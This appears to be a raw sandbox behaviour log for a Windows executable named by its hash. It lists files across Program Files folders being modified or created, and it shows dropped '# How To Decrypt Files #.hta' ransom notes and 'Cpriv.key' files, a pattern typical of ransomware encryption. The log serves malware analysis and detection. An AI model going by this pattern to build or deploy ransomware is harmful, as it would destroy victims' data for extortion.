de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14792_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\FiveRules.potx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\REMOTES.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02437_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01237_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR38F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.access de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212299.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft.NET de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\TECHTOOL.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IA32.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javaws.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-nodes.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Issues.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Media Renderer\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Web Folders\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR11F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\INFOML.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\net.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00555_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME53.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\Ole DB\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB5A.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\AWARDHM.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14580_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15134_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Americana.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\fi.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\15x15dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\an\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\DESIGNER\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239611.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR43B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\AddInViews\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLENDS\BLENDS.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101863.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\J0115875.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00103_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MSN.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01084_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099146.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Perspective.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0332268.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\WATERMAR\WATERMAR.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Library\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\MSBuild\Microsoft\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-overlay.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240189.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\DataServices\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR33B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\WindowsPowerShell\Configuration\Schema\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\jfxrt.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10298_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ir.idl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\RTF_BOLD.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw32.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\XLSTART\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART5.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\XML Files\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01839_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\deploy\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Equity.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\OutDomain.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\flyout.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01123_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\settings.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301418.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Maroon.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PROOF\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\0.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_photo_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10263_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01160_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00391_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04326_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OneNote\SendToOneNote-PipelineConfig.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_bkg_orange.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\EDGE\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\shatter.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg 